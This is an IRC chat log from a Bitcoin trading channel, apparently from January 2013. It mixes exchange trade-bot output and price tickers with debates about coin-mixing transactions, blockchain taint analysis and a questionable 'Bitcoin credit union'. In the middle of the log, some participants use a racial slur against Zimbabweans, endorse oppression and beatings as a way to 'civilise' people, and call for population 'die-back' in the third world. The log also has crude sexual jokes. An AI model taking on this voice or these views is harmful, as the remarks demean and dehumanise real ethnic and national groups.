19:43:56 zimbabwe has $247 in bank... wanna buy? Jan 30 19:45:12 buy what, the country ? Jan 30 19:45:17 yes Jan 30 19:45:21 nah, too much hassle. Jan 30 19:47:08 they should kick mugabe and move to bitcoin Jan 30 19:47:35 and list on mpex, if you allow them lol Jan 30 19:48:02 [MPEX] [S.MPOE] 4321 @ 0.00066493 = 2.8732 BTC [-] Jan 30 19:48:03 [MPEX] [S.MPOE] 22185 @ 0.00066467 = 14.7457 BTC [-] Jan 30 19:48:05 [MPEX] [S.MPOE] 1707 @ 0.00066282 = 1.1314 BTC [-] Jan 30 19:48:06 [MPEX] [S.MPOE] 15537 @ 0.00066045 = 10.2614 BTC [-] Jan 30 19:48:07 [MPEX] [S.MPOE] 2350 @ 0.00065833 = 1.5471 BTC [-] Jan 30 19:48:11 lol, REAL PRECIOUS JEEM Jan 30 19:48:40 the thing is, they're not smart enough to do any of tham. Jan 30 19:48:44 that* Jan 30 19:49:21 can't run a country on volatility like this. maybe later. Jan 30 19:49:56 when I can afford my own atoll in the south pacific, i'll run my country on BTC. Jan 30 19:50:16 DeadWeasel btc is not particularly volatile for that purpose. Jan 30 19:50:39 would be infinitely better than their current $ Jan 30 19:50:46 exactly. Jan 30 19:51:07 most national currencies are worse than btc in that perspective. Jan 30 19:51:08 true, they can't even control it as is. Jan 30 19:52:13 i mean, when it crapped out it only dropped 90% Jan 30 19:52:23 do you think the greek drachma would have ONLY dropped 90% recently ? Jan 30 19:52:39 for that matter, once things blow over do you suppose the usd will only drop 90% ? Jan 30 19:55:29 19.6999 Jan 30 20:11:26 [MPEX] [S.DICE] 200 @ 0.00734477 = 1.469 BTC [+] Jan 30 20:20:32 ;;ticker Jan 30 20:20:33 BTCUSD ticker | Best bid: 19.63201, Best ask: 19.70472, Bid-ask spread: 0.07271, Last trade: 19.63201, 24 hour volume: 49943.54713803, 24 hour low: 18.70000, 24 hour high: 19.70323, 24 hour vwap: 19.36427 Jan 30 20:22:03 [MPEX] [S.MPOE] 4321 @ 0.00066882 = 2.89 BTC [+] Jan 30 20:22:05 [MPEX] [S.MPOE] 4026 @ 0.00066915 = 2.694 BTC [+] Jan 30 20:22:06 [MPEX] [S.MPOE] 12850 @ 0.00066938 = 8.6015 BTC [+] Jan 30 20:22:08 [MPEX] [S.MPOE] 1253 @ 0.00066967 = 0.8391 BTC [+] Jan 30 20:24:32 why do women fuck better when they have real high heels on ? Jan 30 20:37:08 https://bitcointalk.org/index.php?topic=125629.msg1490001#msg1490001 this totally can't be happening. Jan 30 20:37:18 burnside_afk are you like, paying him to troll me ? Jan 30 20:37:52 [MPEX] [S.DICE] 300 @ 0.00731819 = 2.1955 BTC [-] Jan 30 20:37:54 [MPEX] [S.DICE] 300 @ 0.00731818 = 2.1955 BTC [-] Jan 30 20:37:56 [MPEX] [S.DICE] 1100 @ 0.00730522 = 8.0357 BTC [-] Jan 30 20:42:00 [MPEX] [S.MPOE] 4321 @ 0.00066777 = 2.8854 BTC [-] Jan 30 20:42:01 [MPEX] [S.MPOE] 517 @ 0.00066756 = 0.3451 BTC [-] Jan 30 20:54:13 [MPEX] [S.MPOE] 8583 @ 0.00066756 = 5.7297 BTC [-] Jan 30 20:54:13 [MPEX] [S.MPOE] 2373 @ 0.00066704 = 1.5829 BTC [-] Jan 30 20:54:15 [MPEX] [S.MPOE] 4844 @ 0.00066565 = 3.2244 BTC [-] Jan 30 20:59:13 mircea_popescu: if women fuck better in highheels, I'm willing to bet that it's just a (possibly localized) social phenomenon Jan 30 21:01:01 how much ? Jan 30 21:01:36 Keefe hey, you around ? Jan 30 21:01:40 my data doesn't support that hypothesis Jan 30 21:01:50 about the high heels Jan 30 21:02:04 10 btc, It's probably just a coincidence that it's high heels, could've been converse allstars Jan 30 21:02:20 smickles how do we check it ?! Jan 30 21:02:39 jcpham hum. pics ? Jan 30 21:02:40 we could probably setup a double blind crossover trial Jan 30 21:03:12 smickles well if we just kidnap test subjects off the street its unethical and if i let you bring your own you'll cheat. Jan 30 21:03:27 that's why it needs to be double blind Jan 30 21:03:36 how can you fuck double blind ?! Jan 30 21:03:37 you hire impartial subject, and impartial observers Jan 30 21:03:55 if you hire them they're no longer representative. Jan 30 21:04:33 how do human trials of drugs find subjects? Jan 30 21:04:40 don't they hire people? Jan 30 21:05:01 or, you're saying that only sexworkers would apply? Jan 30 21:05:03 ya but drug stuff objectively interacts with the subjects Jan 30 21:05:18 seems to me usagi has an answer to everything always just before he quits. Jan 30 21:05:19 im saying that whoever will apply fails to represent the entire set adequately Jan 30 21:05:31 that's were statistics come in Jan 30 21:05:35 kakobrekla haven't seen him/her in a while... Jan 30 21:05:43 you'd have to have a large enough set of subjects Jan 30 21:05:51 mircea_popescu he was just here Jan 30 21:05:53 smickles i doubt statistics can help, because the sample is selected Jan 30 21:05:53 and make sure they don't know whats being tested Jan 30 21:06:06 smickles you're gonna hire people to fuck without telling them ? Jan 30 21:06:24 naw, they know generally what they are going to do Jan 30 21:06:27 dub: What's confusing about combining monies to obscure their sources and screw up crappy "taint" analyses? Jan 30 21:06:52 IMO, it is ethical to point out, publically, serious flaws in the way information is presented to the public. Jan 30 21:06:58 but neither the observers or the subjects know what we're trying to test Jan 30 21:06:59 smickles then they're only representing that subsection of the population who'll generally do that. Jan 30 21:07:10 midnightmagic what's this all about ? Jan 30 21:07:43 http://www.theatlanticwire.com/global/2013/01/zimbabwe-down-its-last-217/61562/ Jan 30 21:08:03 poor them Jan 30 21:08:36 Zimbabwe, the country that's home to some of the world's largest platinum and diamond reserves, literally has the same financial standing as a 14-year-old girl after a really good birthday party. Jan 30 21:08:42 mircea_popescu: then we could structure it in a way that we have people in situations where the might likely have sex without being prompted, it would make it larger, take longer and be more expensive Jan 30 21:08:43 i dunno about the 14 yo girl. Jan 30 21:09:11 smickles sounds like a plan. now we know what's with all the cctv Jan 30 21:09:15 they're trying to measure this. Jan 30 21:09:42 mircea_popescu: A little while ago, dub was saying he doesn't understand gmaxwell's mixer thing. It's not really a mixer, it's guaranteed to be essentially impossible to disentangle those sorts of transactions due to the fungibility of bitcoin. Jan 30 21:10:12 o, that thing where he's trying to create a trail showing himself to be rich ? Jan 30 21:10:20 sounded singularly scammy to me, that. Jan 30 21:10:25 mircea_popescu: right. but it has other uses, too. Jan 30 21:10:40 yeah. like, for instance, privately convincing some naive people with a lot of money that you matter. Jan 30 21:10:44 mircea_popescu: It is cryptographically secure; and, actually, gmaxwell is taking a bit of a risk doing it. Jan 30 21:10:57 at any rate i wasn't impressed. Jan 30 21:11:11 no, it's mocking two things: 1) rich-lists, 2) taint analyses. Jan 30 21:11:26 send your btc to mpex, withdraw it, end of story. it's as anon as it will ever get. Jan 30 21:11:50 That's not actually so. *you* know. Jan 30 21:11:55 oh ? Jan 30 21:12:08 how are you going to disentangle btc that went through the same address ? Jan 30 21:12:25 We go to your house with a large lead pipe and start hitting you with it until you tell us. Jan 30 21:12:31 tell you what ? Jan 30 21:13:01 Figuratively of course; or apply legal pressure so it's not worth it to keep it secret. Jan 30 21:13:04 listen Jan 30 21:13:05 Which is kind of the same thing.. Jan 30 21:13:13 i know nothing at all. you can create a gpg sig right now as 34jk5hty895ytg9g4t Jan 30 21:13:15 register it Jan 30 21:13:17 depost Jan 30 21:13:18 withdraw. Jan 30 21:13:28 mircea_popescu: the trail is by txid, addresses are just incidental Jan 30 21:13:28 what do i know ? that it's really 34jk5hty895ytg9g4t's btc ? Jan 30 21:14:31 smickles what do you mean ? i dun follow. Jan 30 21:14:47 hrm. maybe I've misapprehended how you operate MPEX. I've never logged in. Jan 30 21:14:53 Do you really allow anonymous usage of mpex? Jan 30 21:14:56 yeah well. yes. Jan 30 21:15:03 there is no log in :) Jan 30 21:15:08 it's in the faq -.0 Jan 30 21:15:55 well, in that case, at the very least, there's a trust thing which can't be cryptographically avoided, unless you are doing multisig similar to what gmaxwell is. Jan 30 21:16:07 sending to 1Fx3N5iFPDQxUKhhmDJqCMmi3U8Y7gSncx and then withdrawing has the certain advantage that you're actually in a pool of 10's of k's of btc, Jan 30 21:16:11 if I deposit 500,000 bitcoin to you, what happens if you decide to keep it? Jan 30 21:16:14 which gmaxwell's thing will never ever get. Jan 30 21:16:29 that would be an advantage of numbers. Jan 30 21:16:33 midnightmagic deposit it over 500 transactions, what diff does it make to you ? Jan 30 21:16:53 mircea_popescu: Presumably you could, if you wanted, just decide to keep it. Jan 30 21:16:56 mircea_popescu: I believe it's more accurate to say that control of coins goes from one txid to another, rather than one address to another. the fact that it's known which address is associated with wich txid at this time is incidental Jan 30 21:17:13 midnightmagic you don't send the 5th 1k block till you got the 4th to your addy Jan 30 21:17:25 mircea_popescu: But it would be an advantage to join with all those people and withdraw, you are correct. Jan 30 21:17:30 smickles ok, but what does that change ? Jan 30 21:17:41 pedantry Jan 30 21:17:55 midnightmagic im just saying, if i were a scammer trying to part some fiat ivnestors from their money, i'd do the exact thing he's doing. Jan 30 21:18:04 not meaning by this he is a scammer, i still think he's an idiot Jan 30 21:18:08 but the idea isn't too bright. Jan 30 21:18:09 mircea_popescu: The mathematics of it makes it impossible. Jan 30 21:18:19 say what ?! Jan 30 21:18:25 he couldn't steal the coins. Jan 30 21:18:29 not steal the coins. Jan 30 21:18:38 he just goes to buffett and proves to him that he owns address X Jan 30 21:18:39 it's impossible, he doesn't have sole signing authority of a multisig. Jan 30 21:18:51 buffett has a dim understanding of taint and blockchain and doesn't read the forum Jan 30 21:18:59 thus believes this guy actually has a billionty bitcoinz Jan 30 21:19:35 how does he prove to buffett that he "owns" the address from which the money came from? he can't. Jan 30 21:19:51 he just "proves" he's btc-rich by association. Jan 30 21:19:59 that's the entire point of the exercise, right ? Jan 30 21:20:01 no, he can't. Jan 30 21:20:08 no, it's not. Jan 30 21:20:09 [MPEX] [S.MPOE] 456 @ 0.00066565 = 0.3035 BTC [-] Jan 30 21:20:11 [MPEX] [S.MPOE] 7344 @ 0.00066502 = 4.8839 BTC [-] Jan 30 21:20:13 ok, again from the top Jan 30 21:20:17 He's wrecking identity collapse methods. Jan 30 21:20:18 maybe we're not talking of the same thing. Jan 30 21:21:11 Okay, from the top. When someone tries to figure out a particular identity, they use the method as described in the identifying mechanisms presented at 28c3 in germany: transactions "prove" that the person who "owns" the inputs is the same person. Jan 30 21:21:19 right. Jan 30 21:21:32 This method can be used to collect a pile of individual txn and "collapse" all the addresses into one entity. Jan 30 21:21:37 right. Jan 30 21:22:19 They're different addresses though. So gmaxwell comes along and offers to join his own money into a multisig *transaction* which has an output of some other, new addresses. Jan 30 21:22:31 right. Jan 30 21:22:35 Now, the old methjod of collapsing identity fails. *but* individual addresses still remain the property of the original people. Jan 30 21:22:51 and *actual coinage* never actually goes through gmaxwell's hands. Jan 30 21:22:58 right. Jan 30 21:23:03 there's no way of "proving" that the money is in an address that gmaxwell can use to spend. Jan 30 21:23:23 but wait. Jan 30 21:23:39 the entire process actually involves an address of gmaxwell into what'd be a single collapsed identity. Jan 30 21:23:41 right ? Jan 30 21:23:43 so he couldn't go to buffett and prove he owns the coins without lying to him and claiming that "that one txn right there proves i could have controlled x money" because he can't forge the signature of the address from the bigspender. Jan 30 21:23:50 no. Jan 30 21:24:06 ... Jan 30 21:24:06 well. lemme go read wtf he wrote. Jan 30 21:24:23 because I've already done it with him a bunch of times, so lemme go check and see whether it's the same thing. Jan 30 21:24:26 dude, it's simple. currently people think they can group addies into wallets Jan 30 21:24:30 by means of collapsing txns Jan 30 21:24:47 gmaxwell is trying to collect a number of addies in varying wallets into single such collapsed presumed wallets Jan 30 21:24:53 to show that it doesn't work, he tells us. Jan 30 21:25:05 but it may well be to show someone who doesn't read the forum that he has a huge wallet. Jan 30 21:26:28 no, it doesn't pass through his addresses. Jan 30 21:26:36 ok, let me formalise this. Jan 30 21:26:37 https://bitcointalk.org/index.php?topic=139581.msg1486430#msg1486430 Jan 30 21:26:59 [MPEX] [S.DICE] 1491 @ 0.00730522 = 10.8921 BTC [-] Jan 30 21:27:25 What would need to happen would be that someone would have to take the word of a totally untrusted third-party who says, "well look here, this is all from the same person" Jan 30 21:27:51 but this is the naive viewpoint, because identity collapsing could just be limited to txn which involve limited outputs. Jan 30 21:28:10 There's addresses a1-an, b1-bn, ... x1-xn belonging to wallets A, B, ... X. Through tx collapse one can extract out of the blockchain what appear like wallets A', B', ... X'. These wallets will contain a number of addresses, which may or may not coincide with the proper a1-an set for A. In general it's safe to asume that A != A', but it may also be the case that A ~= A'. Jan 30 21:28:15 this ok so far ? Jan 30 21:28:21 At any rate, there's no way to prove to buffett that he specifically had *control* of the coins. Jan 30 21:29:22 the spends go to completely unrelated addresses, which the end-user should be careful not to mix in terms of spending, with the input addresses. Jan 30 21:29:54 well so ok or not ok! Jan 30 21:30:32 hrm. i'd have to think about it some more to agree with your statement. there's a large hand-wavey part wrapped up in the identity collapse. Jan 30 21:31:04 well yeah. but it yields somehow some sort of A' approximation Jan 30 21:31:08 however wildly inaccurate. Jan 30 21:31:09 Also, when you use ~=, do you mean "approximately equals"? Jan 30 21:31:12 yes. Jan 30 21:31:37 in the sense that [1, 9, b] approximately equals the set of prime numbers. Jan 30 21:31:50 b isn't even a number and 9 isn't prime, but hey. Jan 30 21:32:00 pedantry/g 20 Jan 30 21:32:04 lol Jan 30 21:32:27 ;;asks 20 Jan 30 21:32:30 There are currently 14208.378 bitcoins offered at or under 20.0 USD, worth 283035.775173 USD in total. Jan 30 21:33:47 I interpret the ~= to mean that some addresses overlap or can be related to the addresses prior, but that's what I say can't be related unless the owner of the outputs of the transactions signs a non-multisig transaction that requires A' *and* A addresses together in a single-output txn, *and* we assume that people would automatically steal from one another if they could. Jan 30 21:34:18 midnightmagic: I thought gmaxwell was generally against coin mixing, he railled aganst gpumax for that reason unless I am forgetful Jan 30 21:34:33 midnightmagic what difference does all that make tho ? Jan 30 21:34:57 dub: Actually, he railed against gpumax because gpumax appeared to be a coin laundry that the participants were unaware of. (exchanging dirty for pristine at a premium.) Jan 30 21:35:36 mircea_popescu: It means that gmaxwell can't prove to buffett that he owns those coins; and that his purpose isn't to put on a tweed coat and a bowler's hat and smoke a pipe and say he's rich. Jan 30 21:35:47 never mind that, don't jump ahead. Jan 30 21:35:57 im trying to construct the logic of this here, stay with the step we're on Jan 30 21:36:15 midnightmagic: so what he's doing isn't making laundry of btc unnecessary? Jan 30 21:36:22 lol but we can't move on without detailing the method of identity collapse. Jan 30 21:36:44 why ? Jan 30 21:36:45 dub: What he's doing involves two or three (or more) parties who are taking an enormous risk that the outputs won't be used for nefarious purposes. Jan 30 21:36:54 makes no difference. for all we care it can be throwing darts. Jan 30 21:36:57 it's a method. black box. Jan 30 21:37:03 its all about fungibility thought right? Jan 30 21:37:16 which is the aim of money laundering Jan 30 21:37:27 because you are formalizing something based on hand-wavey identity collapse methods which transactions like gmaxwell's proposed txn are being designed specifically to foil. Jan 30 21:37:28 dub: i thought gmax didn't like gpumax b/c it gave financial incentive to undermine the mineing network Jan 30 21:38:13 this is ridiculous. Jan 30 21:38:13 smickles: idk, I thought it was the laundry aspect Jan 30 21:38:30 anyway, my confusion was teh apparent about face Jan 30 21:38:35 dude, if i say "a car will move items around the surface of the earth" a discussion of combustion engines is out of place Jan 30 21:38:36 smickles: I'm not really sure how it could except by tipping someone over 50%. pirate claimed on many occasions that gpumax often had > 50% of the hashrate but he was being responsible wiht it. Jan 30 21:39:08 mircea_popescu: Hey man that's a false analogy. But if you want to rhetorically accept the "identity collapse" thing, fine. Go on then and make your point, I'll listen. Jan 30 21:39:20 thank you! Jan 30 21:39:36 (i just wanted to register my objection early) Jan 30 21:39:43 so, accepting that however flawed, nonsensical or poiintless, some sort of method makes A' out of perceived interractions in the blockchain Jan 30 21:40:02 gmaxwell proposes to deliberately add together a3, b9, c4, f12 etc Jan 30 21:40:21 sorry, whats the difference between "identity colapse" and "money laundering"? Jan 30 21:40:26 so as to carefully construct something that by that however flawerd, nonsensical etc method WOULD APPEAR to be a single wallet, call it G Jan 30 21:40:42 right ? Jan 30 21:40:53 dub: One of them is a forensic analysis of transactions to determine likely owners, and the other is an attempt to use transactions to foil the methods of determining owners. Jan 30 21:41:07 mircea_popescu: No, not a single wallet. Jan 30 21:41:15 midnightmagic: lol but the end result is the same no? Jan 30 21:41:17 oh, sorry, I know what you mean. Jan 30 21:41:22 right! Jan 30 21:41:27 so now, at this point, we have two results. Jan 30 21:41:35 publicly, we have the result that indeed the method is discredited. Jan 30 21:41:53 privately, however, if some idiot doesn;'t know about all this, we have what may be construed as a very fat wallet G Jan 30 21:42:05 which gmaxwell can :"prove" he owns by signing with his own address Jan 30 21:42:08 mircea_popescu: By the methods of identity collapse as they stand, yes, it comingles wallets and makes A B C D ... X all appear to be G Jan 30 21:42:10 as tenuous proof as this would be Jan 30 21:42:24 my point is entirely that some naive party may actually be thus fooled. Jan 30 21:42:36 he couldn't prove he owned them because he could prove he was able to make *all* of the signatures in the multisig. only a fraction of them. Jan 30 21:42:52 right, but that may be the standard he's held to. Jan 30 21:43:00 "a tiny fraction", ie, one. Jan 30 21:43:10 Either you or I could go prove to a naive party that we own all the bticoins in the world right now. Jan 30 21:43:25 well yes, but this is a little more ellaborate than just "it's based on math" Jan 30 21:43:32 now, again, im not saying this is what gmaxwell is doing Jan 30 21:43:50 all im saying is i wouldn't participate inter alia because i have not any way of knowing this isn't the case. Jan 30 21:43:56 Cryptographic proof would require gmaxwell produce sigs which show he was the owner of *all* the inputs to the transaction. Jan 30 21:43:57 as unlikely as it may seem or ultimately be. Jan 30 21:45:37 I would offer that people who would believe gmaxwell's partial multisig signatures means he owned millions of dollars maybe aren't the sort of people you want to be getting into bed in business with anyway. Jan 30 21:45:50 well... maybe. Jan 30 21:46:06 people who have money are usually old. people who grok technology are usually young. Jan 30 21:46:10 the two rarely meet on equal footing. Jan 30 21:46:15 Vint Cerf? Jan 30 21:46:26 I love that guy. He looks like the Architect from the Matrix. Jan 30 21:46:45 http://www.theatlanticwire.com/global/2013/01/zimbabwe-down-its-last-217/61562/ Jan 30 21:46:49 this article is great, incidentally. Jan 30 21:46:59 buncha niggers got uppity, kicked out the white "opressors" Jan 30 21:47:00 Don't super-rich people usually rely on other people to tell them what's going on? Jan 30 21:47:02 are now starving. Jan 30 21:47:24 whoa brutal man :-/ Jan 30 21:47:27 midnightmagic yeah. problem is sometimes these people are experts a la taaki. Jan 30 21:47:37 taaki? Jan 30 21:47:49 midnightmagic right. stealing farmer's farms because they're white wasn't brutal. Jan 30 21:48:06 mircea_popescu: Calling them names isn't helpful given the brutal oppression involved. Jan 30 21:48:16 mircea_popescu: http://www.upi.com/Odd_News/2013/01/17/Zimbabwe-clinic-cleared-of-goblins/UPI-22371358443628/ << better Jan 30 21:48:24 im all for opression. Jan 30 21:48:38 the civilisation of the human race is a work of opression. our problem is that we've stopped doing it. Jan 30 21:49:00 hahaha goblins. Jan 30 21:49:10 "IRISVALE HALT, Zimbabwe, Jan. 17 (UPI) -- Residents of a Zimbabwe village said they've "cleansed" a medical clinic of goblins but nurses who fled the clinic are still too afraid to come back to work." Jan 30 21:49:10 lmao Jan 30 21:49:18 ihalped.jpg Jan 30 21:49:18 i'm gonna have to back slowly away from this conversation now.. Jan 30 21:49:34 or at least that topic. Jan 30 21:50:16 you seriously see a problem with smacking the "residents" of the hut agglomeration across the skull Jan 30 21:50:23 till they're cleansed of goblins in the head ? Jan 30 21:51:23 i suspect the (language used in)zimbabwe to english transation which results in goblin, starts with ginger Jan 30 21:51:54 doubt it Jan 30 21:52:07 prolly some sort of evil spirit Jan 30 21:52:08 i want to belive Jan 30 21:52:15 whatcha got against gingers ? Jan 30 21:52:20 that they arn't seriously talike about goblins Jan 30 21:52:41 *talken' Jan 30 21:52:48 thats the seat of the 'raping virgiins cures your aids' wisdom Jan 30 21:53:09 is the goblin cleanse involving people getting the shit kicked out of them? Jan 30 21:53:11 dub i thought that was more like congo Jan 30 21:53:32 midnightmagic i wonder how they pronounce salem in khosa Jan 30 21:53:48 unfortunately I think the reality is that our species needs quite a bit of die-back and the natural place for this to occur is the third world Jan 30 21:54:01 I see a problem with the notion that white people are blameless and that civilising people requires brutal murderous oppression. Jan 30 21:54:04 xhosa* Jan 30 21:54:20 white people are not blameless Jan 30 21:54:26 in fact, they're about as stupid as anyone else. Jan 30 21:54:31 but civilising requires beating. Jan 30 21:54:35 I agree! Jan 30 21:54:42 I disagree with the beating statement! Jan 30 21:54:45 lol Jan 30 21:54:47 heh. too late :D Jan 30 21:55:17 All it needs is a strong science-based education and it just naturally follows. Jan 30 21:55:23 mircea_popescu: the only thing i have against gingers is that there is more humor revolving around gingers than mutt-american Jan 30 21:55:23 heh heh Jan 30 21:55:26 ever since you bleedin' hearts took out the beatings nothing gets done anymore. Jan 30 21:55:57 smickles actually ginger chicks are the best! Jan 30 21:56:12 dark red angry chicks are pretty awesome. Jan 30 21:56:12 i don't hold that against them tho Jan 30 21:56:13 :P Jan 30 21:56:41 lol Jan 30 21:56:53 plus, a good caning shows for like a week Jan 30 21:58:39 anyway. so is zimbabwe becoming the first extrateritorial province of china ? Jan 30 22:00:38 don't they own the majority of America's debt too? Jan 30 22:00:45 about to take out $20 Jan 30 22:02:37 ;;ticker Jan 30 22:02:38 BTCUSD ticker | Best bid: 19.65807, Best ask: 19.68000, Bid-ask spread: 0.02193, Last trade: 19.68000, 24 hour volume: 49442.39791191, 24 hour low: 18.70000, 24 hour high: 19.73800, 24 hour vwap: 19.37328 Jan 30 22:03:53 americans seem to be more willing to just inflate their currency rather than let the chinese dominate foreign debt as much as they were. Jan 30 22:04:20 yeah but i suspect the chinese are about a degree of magnitude more competent with infiltration Jan 30 22:06:37 All it needs is a strong science-based education and it just naturally follows. Jan 30 22:06:41 lol Jan 30 22:06:59 that is some religion level disconnect Jan 30 22:07:01 we need more bitches up in herr Jan 30 22:07:04 alll it needs is math. Jan 30 22:07:06 here* Jan 30 22:07:14 mircea_popescu: MAFF Jan 30 22:07:18 muff ? Jan 30 22:07:26 and fings Jan 30 22:09:02 EskimoBob: hater to the end Jan 30 22:11:40 [MPEX] [S.MPOE] 4321 @ 0.00066935 = 2.8923 BTC [+] Jan 30 22:11:42 [MPEX] [S.MPOE] 4100 @ 0.00066967 = 2.7456 BTC [+] Jan 30 22:11:43 [MPEX] [S.MPOE] 4079 @ 0.00067234 = 2.7425 BTC [+] Jan 30 22:12:08 dub: 11:55 < midnightmagic> heh heh Jan 30 22:12:23 dub: So.. I guess.. that is some religion-level context elimination Jan 30 22:12:42 :) Jan 30 22:13:10 guilty Jan 30 22:15:25 if you're going to make better people by educating them Jan 30 22:15:35 history is prolly a better bet than maff. Jan 30 22:15:56 EskimoBob: stop talking to yourself crazy person, everyone else tuned you out a long time ago Jan 30 22:16:41 angry EskimoBob Jan 30 22:17:39 vitriolic people who aren't angry usually have scarier problems? Jan 30 22:18:11 [MPEX] [S.DICE] 1800 @ 0.00730522 = 13.1494 BTC [-] Jan 30 22:19:50 https://twitter.com/jgarzik Jan 30 22:20:43 http://dundundun.net/ Jan 30 22:21:54 the tweet Jan 30 22:22:18 I'd be out the door quick smart Jan 30 22:22:29 fuck work or whatever else he's doing Jan 30 22:22:37 yeah no joke Jan 30 22:22:39 o is it ?! Jan 30 22:22:42 every moment he delays is money out of his pocket Jan 30 22:22:47 i would be mining Jan 30 22:22:51 it if exists Jan 30 22:22:53 Maybe someone will buy my idiffs Jan 30 22:23:13 lolz Jan 30 22:23:13 boss: I've got the shits, bye Jan 30 22:23:14 EskimoBob: Did you rage and forget the rage? Jan 30 22:23:24 wait, wait. Jan 30 22:23:33 wasn't someone posting a supposed cgiminer screenshot earlier ? Jan 30 22:23:41 mircea_popescu: wizkid was trolling Jan 30 22:23:45 i thought it was from j a ok Jan 30 22:24:30 how long did it take in the end, 10 days ? Jan 30 22:26:18 https://bitcointalk.org/index.php?topic=140052 Jan 30 22:26:20 this is pretty good. Jan 30 22:27:10 b-cup? Jan 30 22:27:21 who ? Jan 30 22:27:43 no way i'm giving that guy money Jan 30 22:27:57 i rememeber all his spew on the foum after pirate ditched Jan 30 22:28:05 he was going to "help out" Jan 30 22:28:42 what, apprehend the evil doers and restore peace and justice Jan 30 22:28:45 and save the day ? Jan 30 22:29:03 tom green is like gengis khan. somehow he's managed to have like 200 million kids. Jan 30 22:31:41 lol, so he raised the 15million or so usd to start a credit union? Jan 30 22:31:47 it says it's 100% legal Jan 30 22:32:41 I don't think he's in the US Jan 30 22:33:33 i don't think he knows what he's doing. Jan 30 22:33:45 has some funny site run off a sort of blogspot free hoster Jan 30 22:33:58 [MPEX] [S.MPOE] 2385 @ 0.00066502 = 1.5861 BTC [-] Jan 30 22:34:00 [MPEX] [S.MPOE] 10450 @ 0.00066216 = 6.9196 BTC [-] Jan 30 22:34:01 [MPEX] [S.MPOE] 9350 @ 0.00065909 = 6.1625 BTC [-] Jan 30 22:35:24 [BTCTC] [GSDPT] 85 @ 0.0075 = 0.6375 BTC [+] Jan 30 22:36:25 [BTCTC] [GSDPT] 100 @ 0.0075 = 0.75 BTC [+] Jan 30 22:41:22 dub:BITCOIN CREDIT UNION Jan 30 22:41:22 8613 REED DRIVE #1 Jan 30 22:41:22 28594 EMERALD ISLE NC Jan 30 22:41:23 USA Jan 30 22:41:28 from his link Jan 30 22:41:51 otru Jan 30 22:41:53 cool, cause his link is to norway's dba authority Jan 30 22:41:55 are people sending him coins? Jan 30 22:42:21 and theres some reference to having to do it in sweden somewhere Jan 30 22:42:26 they inevitably will Jan 30 22:42:39 bitcoin wants to be sent. Jan 30 22:43:15 smickles see what a sucker you are ? Jan 30 22:43:24 should have made a credit union instead of an accounting firm Jan 30 22:43:36 it does. it's so easy it almost jumps out of my wallet. Jan 30 22:43:47 § 54‑50. Number of incorporators; capital stock. Jan 30 22:43:48 Any number of persons, resident freeholders of the State, not less than 15, may associate to establish an association on the terms and conditions and subject to the liabilities hereinafter prescribed. The aggregate amount of the capital stock of any such association shall not be less than twenty thousand dollars ($20,000). Such association shall mean a corporation organized under the laws of the State for the purpose of making loans upon agricultu Jan 30 22:44:01 well, it's a little easer than arizona Jan 30 22:44:19 but NC requires 15 peeps and 20kusd Jan 30 22:44:47 whoa no wai. Jan 30 22:44:54 there's just no wai that's the whole story. Jan 30 22:44:59 and if he just meets the minimus, it severely limits what he can do in his operations Jan 30 22:46:35 Wait, I don't see the point of what he is doing. If you need to exchange there is GOX and if someone needs a loan they just go scam off the lending forum right? Jan 30 22:47:13 jborkl something like that Jan 30 22:50:29 mircea_popescu: actually, it changed in 1981 Jan 30 22:50:32 to 10 peeps Jan 30 22:50:39 and 350000 usd Jan 30 22:51:28 jesus christ Jan 30 22:51:32 and an additional 75000 to be held has proof they can pay their expenses for the first year Jan 30 22:51:39 the internet might be about to have a bad day Jan 30 22:51:55 all funds have to be withdrawable in us legal tender if requested Jan 30 22:52:22 the administrator of it has to have a net worth of >=1.5 million usd Jan 30 22:52:28 *personal net worth Jan 30 22:53:29 it needs a permanent capital reserver of no less than 500000 in addition to all this other stuff Jan 30 22:53:59 EskimoBob logic 101: 1) call eveyone names and generally make a cunt out of yourself 2) ask them to break teh law for you Jan 30 22:58:49 [BTCTC] [RSM] 1 @ 0.008 BTC [-] Jan 30 23:05:38 EskimoBob: rather than circumventing local law, why don't you get the law changed? Jan 30 23:06:58 heh, i'm sure it take longer than that, but lowering taxes ought to be popular enough Jan 30 23:07:44 and there is probably an organization already trying to acheive the same goal Jan 30 23:09:24 how long does it take before a bet appears on bitbet ? Jan 30 23:10:08 lol Jan 30 23:10:11 EskimoBob: http://www.cutthevat.co.uk/ Jan 30 23:11:18 if you ain't co.ukian, i'm sure they could put you in touch with your country's similar organization Jan 30 23:12:32 heh, an excellent reason why you should pay the vat Jan 30 23:12:38 you don't care to oppose it Jan 30 23:23:42 whats the point in being in politics they all as bad as each other Jan 30 23:24:28 and yep 20% vat sux Jan 30 23:29:39 muahahha Jan 30 23:29:57 smickles the credit union is Sweeeeeeeeeedish Jan 30 23:30:09 he complies with all Sweeeeden laws Jan 30 23:35:13 rape capital of the world Jan 30 23:35:24 wow. S.DICE over 1,100,000 BTC bet this month Jan 30 23:43:06 [HAVELOCK] [KCIM] 1 @ 0.9789 BTC [-] Jan 30 23:45:06 [HAVELOCK] [KCIM] 5 @ 0.95 = 4.75 BTC [-] Jan 30 23:50:57 http://garzikrants.blogspot.sk/2013/01/once-upon-time-in-china-package-shipped.html Jan 30 23:51:42 its HUGE Jan 30 23:52:00 its not really that big Jan 30 23:52:05 its smaller than my ATX case Jan 30 23:57:52 They shipped it with a chinese power cable? Jan 30 23:58:01 hope he has an adapter Jan 30 23:58:06 hmm... S.DICE profits went down like hell... Jan 30 23:58:21 yah Jan 30 23:58:24 variance dood Jan 30 23:58:35 nobody talks about the variance when S.DICE outperforms Jan 30 23:59:12 i love variance Jan 30 23:59:33 ;;calc 21000/.0075/100000000 Jan 30 23:59:33 0.028 Jan 30 23:59:43 2.8% EV dividend Jan 30 23:59:45 not bad Jan 30 23:59:58 ;;calc 21000/.00735/100000000 Jan 30 23:59:59 0.0285714285714 Jan 31 00:01:18 >7000 bids over 19, >30000 bids over 18, 13000 bids below 20. I think tonight is the night Jan 31 00:01:34 We're not at 21k profit tho =P Jan 31 00:01:45 sadly =/ Jan 31 00:01:52 well Jan 31 00:02:12 if your vision is only till the end of the month, disappointment is understandable Jan 31 00:02:37 If your vision is for a few months from now... that growth rate and EV return should support a higher share valuation Jan 31 00:02:50 I think .01 is likely soon. Jan 31 00:03:49 It's mostly fueled by some large "whale" Jan 31 00:03:57 who knows when it will go away Jan 31 00:04:25 I prefer seeing lots of smaller gamblers growth. Jan 31 00:04:58 yes, and we have seen smaller gamblers growth too Jan 31 